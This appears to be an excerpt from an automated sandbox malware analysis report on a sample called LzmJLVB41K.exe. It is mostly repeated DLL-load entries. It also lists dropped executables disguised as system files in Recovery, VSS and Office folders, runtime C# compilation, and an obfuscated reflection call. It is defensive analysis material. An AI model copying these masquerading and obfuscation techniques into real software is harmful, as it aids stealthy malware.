                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: apphelp.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: version.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: wldp.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: profapi.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: version.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: uxtheme.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: wldp.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: profapi.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\ctfmon.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\5b884080fd4f94
                            Source: LzmJLVB41K.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: LzmJLVB41K.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: LzmJLVB41K.exeStatic file information: File size 1998336 > 1048576
                            Source: LzmJLVB41K.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1e7600
                            Source: LzmJLVB41K.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: :C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.pdb source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: :C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.pdb source: LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.cs.Net Code: Type.GetTypeFromHandle(Alushx29ZpQi3KArJrn.k9fAuiBq2NK(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Alushx29ZpQi3KArJrn.k9fAuiBq2NK(16777245)),Type.GetTypeFromHandle(Alushx29ZpQi3KArJrn.k9fAuiBq2NK(16777259))})
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.cmdline"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a4ouxeif\a4ouxeif.cmdline"
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 0_2_00007FFD348C53B2 pushad ; ret 0_2_00007FFD348C53B5
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 0_2_00007FFD34CB755D push ebx; iretd 0_2_00007FFD34CB756A
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeCode function: 8_2_00007FFD348B53B2 pushad ; ret 8_2_00007FFD348B53B5
                            Source: C:\Recovery\fozAQGvSmfTQIywuzSgk.exeCode function: 9_2_00007FFD348953B2 pushad ; ret 9_2_00007FFD348953B5
